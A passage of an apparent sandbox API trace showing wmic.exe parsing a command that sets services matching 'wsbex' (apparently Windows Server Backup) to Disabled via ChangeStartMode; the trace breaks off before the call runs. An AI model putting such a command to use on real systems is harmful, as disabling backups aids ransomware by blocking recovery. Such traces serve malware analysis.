(lpString="'Disabled'") returned 10 [0117.701] lstrlenW (lpString="QUIT") returned 4 [0117.701] lstrlenW (lpString="SERVICE") returned 7 [0117.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0117.701] lstrlenW (lpString="EXIT") returned 4 [0117.701] lstrlenW (lpString="SERVICE") returned 7 [0117.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0117.701] WbemLocator:IUnknown:AddRef (This=0xa13488) returned 0x2 [0117.701] lstrlenW (lpString="/") returned 1 [0117.701] lstrlenW (lpString="SERVICE") returned 7 [0117.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0117.701] lstrlenW (lpString="-") returned 1 [0117.701] lstrlenW (lpString="SERVICE") returned 7 [0117.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0117.701] lstrlenW (lpString="CLASS") returned 5 [0117.701] lstrlenW (lpString="SERVICE") returned 7 [0117.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0117.701] lstrlenW (lpString="PATH") returned 4 [0117.701] lstrlenW (lpString="SERVICE") returned 7 [0117.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0117.701] lstrlenW (lpString="CONTEXT") returned 7 [0117.701] lstrlenW (lpString="SERVICE") returned 7 [0117.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0117.701] lstrlenW (lpString="SERVICE") returned 7 [0117.701] lstrlenW (lpString="SERVICE") returned 7 [0117.701] GetCurrentThreadId () returned 0xfa8 [0117.701] ??0CHString@@QAE@XZ () returned 0x82f9fc [0117.702] WbemLocator:IWbemLocator:ConnectServer (in: This=0xa13488, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0xa307a8) returned 0x0 [0117.723] CoSetProxyBlanket (pProxy=0xa307a8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0117.724] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.724] GetCurrentThreadId () returned 0xfa8 [0117.724] ??0CHString@@QAE@XZ () returned 0x82f9a4 [0117.724] SysStringLen (param_1="root\\cli") returned 0x8 [0117.724] SysStringLen (param_1="\\") returned 0x1 [0117.724] SysStringLen (param_1="root\\cli\\") returned 0x9 [0117.724] SysStringLen (param_1="ms_409") returned 0x6 [0117.724] WbemLocator:IWbemLocator:ConnectServer (in: This=0xa13488, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0xa30cf8) returned 0x0 [0117.731] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.731] GetCurrentThreadId () returned 0xfa8 [0117.731] ??0CHString@@QAE@XZ () returned 0x82fa00 [0117.732] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0117.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x978a78, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0117.732] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0117.732] SysStringLen (param_1="SERVICE") returned 0x7 [0117.732] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0117.732] SysStringLen (param_1="'") returned 0x1 [0117.732] IWbemServices:GetObject (in: This=0xa307a8, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x82f9fc*=0x0, ppCallResult=0x0 | out: ppObject=0x82f9fc*=0xa401a8, ppCallResult=0x0) returned 0x0 [0117.739] IWbemClassObject:Get (in: This=0xa401a8, wszName="Target", lFlags=0, pVal=0x82f9d4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f9d4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.739] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0117.739] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0117.739] IWbemClassObject:Get (in: This=0xa401a8, wszName="PWhere", lFlags=0, pVal=0x82f9d4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f9d4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.739] lstrlenW (lpString="WHERE Name='#'") returned 14 [0117.739] lstrlenW (lpString="WHERE Name='#'") returned 14 [0117.739] IWbemClassObject:Get (in: This=0xa401a8, wszName="Connection", lFlags=0, pVal=0x82f9d4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f9d4*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa40568, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.739] IUnknown:QueryInterface (in: This=0xa40568, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x82f9f0 | out: ppvObject=0x82f9f0*=0xa40568) returned 0x0 [0117.739] GetCurrentThreadId () returned 0xfa8 [0117.739] ??0CHString@@QAE@XZ () returned 0x82f970 [0117.739] IWbemClassObject:Get (in: This=0xa40568, wszName="Namespace", lFlags=0, pVal=0x82f954*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f954*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.739] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0117.739] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0117.739] IWbemClassObject:Get (in: This=0xa40568, wszName="Locale", lFlags=0, pVal=0x82f954*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3774c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f954*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.739] lstrlenW (lpString="ms_409") returned 6 [0117.739] lstrlenW (lpString="ms_409") returned 6 [0117.739] IWbemClassObject:Get (in: This=0xa40568, wszName="User", lFlags=0, pVal=0x82f954*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3774c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f954*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.740] IWbemClassObject:Get (in: This=0xa40568, wszName="Password", lFlags=0, pVal=0x82f954*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f954*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.740] IWbemClassObject:Get (in: This=0xa40568, wszName="Server", lFlags=0, pVal=0x82f954*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f954*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.740] lstrlenW (lpString=".") returned 1 [0117.740] lstrlenW (lpString=".") returned 1 [0117.740] IWbemClassObject:Get (in: This=0xa40568, wszName="Authority", lFlags=0, pVal=0x82f954*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3774c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f954*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.740] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.740] IUnknown:Release (This=0xa40568) returned 0x1 [0117.740] GetCurrentThreadId () returned 0xfa8 [0117.740] ??0CHString@@QAE@XZ () returned 0x82f960 [0117.740] IWbemClassObject:Get (in: This=0xa401a8, wszName="__RELPATH", lFlags=0, pVal=0x82f948*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f948*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.740] GetCurrentThreadId () returned 0xfa8 [0117.740] ??0CHString@@QAE@XZ () returned 0x82f8dc [0117.740] ??0CHString@@QAE@PBG@Z () returned 0x82f8d8 [0117.740] ??0CHString@@QAE@ABV0@@Z () returned 0x82f858 [0117.740] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0117.740] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x978ab8 [0117.740] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0117.740] ?Left@CHString@@QBE?AV1@H@Z () returned 0x82f850 [0117.740] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x82f854 [0117.740] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x82f8d8 [0117.740] ??1CHString@@QAE@XZ () returned 0x1 [0117.740] ??1CHString@@QAE@XZ () returned 0x1 [0117.740] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x82f84c [0117.740] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x82f858 [0117.740] ??1CHString@@QAE@XZ () returned 0x1 [0117.740] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x978b18 [0117.740] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0117.740] ?Left@CHString@@QBE?AV1@H@Z () returned 0x82f850 [0117.740] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x82f854 [0117.740] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x82f8d8 [0117.740] ??1CHString@@QAE@XZ () returned 0x1 [0117.741] ??1CHString@@QAE@XZ () returned 0x1 [0117.741] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x82f84c [0117.741] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x82f858 [0117.741] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.741] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0117.741] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.741] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0117.741] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0117.741] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0117.741] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0117.741] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0117.741] SysStringLen (param_1="\"") returned 0x1 [0117.741] IWbemServices:GetObject (in: This=0xa30cf8, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x82f8e8*=0x0, ppCallResult=0x0 | out: ppObject=0x82f8e8*=0xa40948, ppCallResult=0x0) returned 0x0 [0117.743] IWbemClassObject:Get (in: This=0xa40948, wszName="Text", lFlags=0, pVal=0x82f8b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f8b4*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3fb50*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xa33578, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.743] SafeArrayGetLBound (in: psa=0xa3fb50, nDim=0x1, plLbound=0x82f8c4 | out: plLbound=0x82f8c4) returned 0x0 [0117.743] SafeArrayGetUBound (in: psa=0xa3fb50, nDim=0x1, plUbound=0x82f8c8 | out: plUbound=0x82f8c8) returned 0x0 [0117.743] SafeArrayGetElement (in: psa=0xa3fb50, rgIndices=0x82f8e0, pv=0x82f8cc | out: pv=0x82f8cc) returned 0x0 [0117.743] SysStringLen (param_1="Service application management. ") returned 0x20 [0117.743] IUnknown:Release (This=0xa40948) returned 0x0 [0117.743] ??1CHString@@QAE@XZ () returned 0x1 [0117.743] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.743] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.743] lstrlenW (lpString="Service application management. ") returned 32 [0117.743] lstrlenW (lpString="Service application management. ") returned 32 [0117.743] IUnknown:Release (This=0xa401a8) returned 0x0 [0117.744] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.744] lstrlenW (lpString="PATH") returned 4 [0117.744] lstrlenW (lpString="WHERE") returned 5 [0117.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0117.744] lstrlenW (lpString="WHERE") returned 5 [0117.744] lstrlenW (lpString="WHERE") returned 5 [0117.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0117.744] lstrlenW (lpString="/") returned 1 [0117.744] lstrlenW (lpString="caption LIKE '%wsbex%'") returned 22 [0117.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%wsbex%'", cchCount1=22, lpString2="/", cchCount2=1) returned 3 [0117.744] lstrlenW (lpString="-") returned 1 [0117.744] lstrlenW (lpString="caption LIKE '%wsbex%'") returned 22 [0117.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%wsbex%'", cchCount1=22, lpString2="-", cchCount2=1) returned 3 [0117.744] lstrlenW (lpString="caption LIKE '%wsbex%'") returned 22 [0117.744] lstrlenW (lpString="caption LIKE '%wsbex%'") returned 22 [0117.744] lstrlenW (lpString="/") returned 1 [0117.744] lstrlenW (lpString="CALL") returned 4 [0117.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0117.744] lstrlenW (lpString="-") returned 1 [0117.744] lstrlenW (lpString="CALL") returned 4 [0117.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0117.744] lstrlenW (lpString="CALL") returned 4 [0117.744] lstrlenW (lpString="CALL") returned 4 [0117.744] lstrlenW (lpString="GET") returned 3 [0117.744] lstrlenW (lpString="CALL") returned 4 [0117.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0117.744] lstrlenW (lpString="LIST") returned 4 [0117.744] lstrlenW (lpString="CALL") returned 4 [0117.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0117.744] lstrlenW (lpString="SET") returned 3 [0117.744] lstrlenW (lpString="CALL") returned 4 [0117.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0117.744] lstrlenW (lpString="CREATE") returned 6 [0117.744] lstrlenW (lpString="CALL") returned 4 [0117.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0117.744] lstrlenW (lpString="CALL") returned 4 [0117.744] lstrlenW (lpString="CALL") returned 4 [0117.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0117.744] lstrlenW (lpString="/") returned 1 [0117.744] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="/", cchCount2=1) returned 3 [0117.745] lstrlenW (lpString="-") returned 1 [0117.745] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="-", cchCount2=1) returned 3 [0117.745] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.745] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.745] GetCurrentThreadId () returned 0xfa8 [0117.745] ??0CHString@@QAE@XZ () returned 0x82f16c [0117.745] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0117.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x978b68, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0117.745] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0117.745] SysStringLen (param_1="SERVICE") returned 0x7 [0117.745] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0117.745] SysStringLen (param_1="'") returned 0x1 [0117.745] IWbemServices:GetObject (in: This=0xa307a8, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x82f148*=0x0, ppCallResult=0x0 | out: ppObject=0x82f148*=0xa401a8, ppCallResult=0x0) returned 0x0 [0117.750] lstrlenW (lpString="CALL") returned 4 [0117.750] lstrlenW (lpString="CALL") returned 4 [0117.750] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0117.750] IWbemClassObject:Get (in: This=0xa401a8, wszName="Verbs", lFlags=0, pVal=0x82f100*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f100*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3f940*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xa3fa80, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.751] SafeArrayGetLBound (in: psa=0xa3f940, nDim=0x1, plLbound=0x82f110 | out: plLbound=0x82f110) returned 0x0 [0117.751] SafeArrayGetUBound (in: psa=0xa3f940, nDim=0x1, plUbound=0x82f118 | out: plUbound=0x82f118) returned 0x0 [0117.751] SafeArrayGetElement (in: psa=0xa3f940, rgIndices=0x82f120, pv=0x82f154 | out: pv=0x82f154) returned 0x0 [0117.751] IWbemClassObject:Get (in: This=0xa57448, wszName="Name", lFlags=0, pVal=0x82f0f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.751] lstrlenW (lpString="StartService") returned 12 [0117.751] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.751] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StartService", cchCount2=12) returned 1 [0117.751] IUnknown:Release (This=0xa57448) returned 0x1 [0117.751] SafeArrayGetElement (in: psa=0xa3f940, rgIndices=0x82f120, pv=0x82f154 | out: pv=0x82f154) returned 0x0 [0117.752] IWbemClassObject:Get (in: This=0xa57978, wszName="Name", lFlags=0, pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.752] lstrlenW (lpString="StopService") returned 11 [0117.752] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.752] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StopService", cchCount2=11) returned 1 [0117.752] IUnknown:Release (This=0xa57978) returned 0x1 [0117.752] SafeArrayGetElement (in: psa=0xa3f940, rgIndices=0x82f120, pv=0x82f154 | out: pv=0x82f154) returned 0x0 [0117.752] IWbemClassObject:Get (in: This=0xa40690, wszName="Name", lFlags=0, pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.752] lstrlenW (lpString="PauseService") returned 12 [0117.752] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.752] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="PauseService", cchCount2=12) returned 1 [0117.752] IUnknown:Release (This=0xa40690) returned 0x1 [0117.752] SafeArrayGetElement (in: psa=0xa3f940, rgIndices=0x82f120, pv=0x82f154 | out: pv=0x82f154) returned 0x0 [0117.752] IWbemClassObject:Get (in: This=0xa40bd0, wszName="Name", lFlags=0, pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.752] lstrlenW (lpString="ResumeService") returned 13 [0117.752] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.752] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ResumeService", cchCount2=13) returned 1 [0117.752] IUnknown:Release (This=0xa40bd0) returned 0x1 [0117.752] SafeArrayGetElement (in: psa=0xa3f940, rgIndices=0x82f120, pv=0x82f154 | out: pv=0x82f154) returned 0x0 [0117.752] IWbemClassObject:Get (in: This=0xa41138, wszName="Name", lFlags=0, pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.752] lstrlenW (lpString="InterrogateService") returned 18 [0117.752] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.752] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="InterrogateService", cchCount2=18) returned 1 [0117.752] IUnknown:Release (This=0xa41138) returned 0x1 [0117.752] SafeArrayGetElement (in: psa=0xa3f940, rgIndices=0x82f120, pv=0x82f154 | out: pv=0x82f154) returned 0x0 [0117.753] IWbemClassObject:Get (in: This=0xa412d0, wszName="Name", lFlags=0, pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.753] lstrlenW (lpString="UserControlService") returned 18 [0117.753] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.753] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="UserControlService", cchCount2=18) returned 1 [0117.753] IUnknown:Release (This=0xa412d0) returned 0x1 [0117.753] SafeArrayGetElement (in: psa=0xa3f940, rgIndices=0x82f120, pv=0x82f154 | out: pv=0x82f154) returned 0x0 [0117.753] IWbemClassObject:Get (in: This=0xa41468, wszName="Name", lFlags=0, pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.753] lstrlenW (lpString="Create") returned 6 [0117.753] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.753] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Create", cchCount2=6) returned 1 [0117.753] IUnknown:Release (This=0xa41468) returned 0x1 [0117.753] SafeArrayGetElement (in: psa=0xa3f940, rgIndices=0x82f120, pv=0x82f154 | out: pv=0x82f154) returned 0x0 [0117.753] IWbemClassObject:Get (in: This=0xa41600, wszName="Name", lFlags=0, pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.753] lstrlenW (lpString="Change") returned 6 [0117.753] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.753] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Change", cchCount2=6) returned 3 [0117.753] IUnknown:Release (This=0xa41600) returned 0x1 [0117.753] SafeArrayGetElement (in: psa=0xa3f940, rgIndices=0x82f120, pv=0x82f154 | out: pv=0x82f154) returned 0x0 [0117.753] IWbemClassObject:Get (in: This=0xa60bc0, wszName="Name", lFlags=0, pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.753] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.753] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.753] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ChangeStartMode", cchCount2=15) returned 2 [0117.753] GetCurrentThreadId () returned 0xfa8 [0117.753] ??0CHString@@QAE@XZ () returned 0x82ef6c [0117.753] IWbemClassObject:Get (in: This=0xa60bc0, wszName="Description", lFlags=0, pVal=0x82ef3c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82ef3c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ChangeStartMode method modifies the StartMode of a service. It returns an integer value of 0 if the service was successfully modified, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.754] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.754] 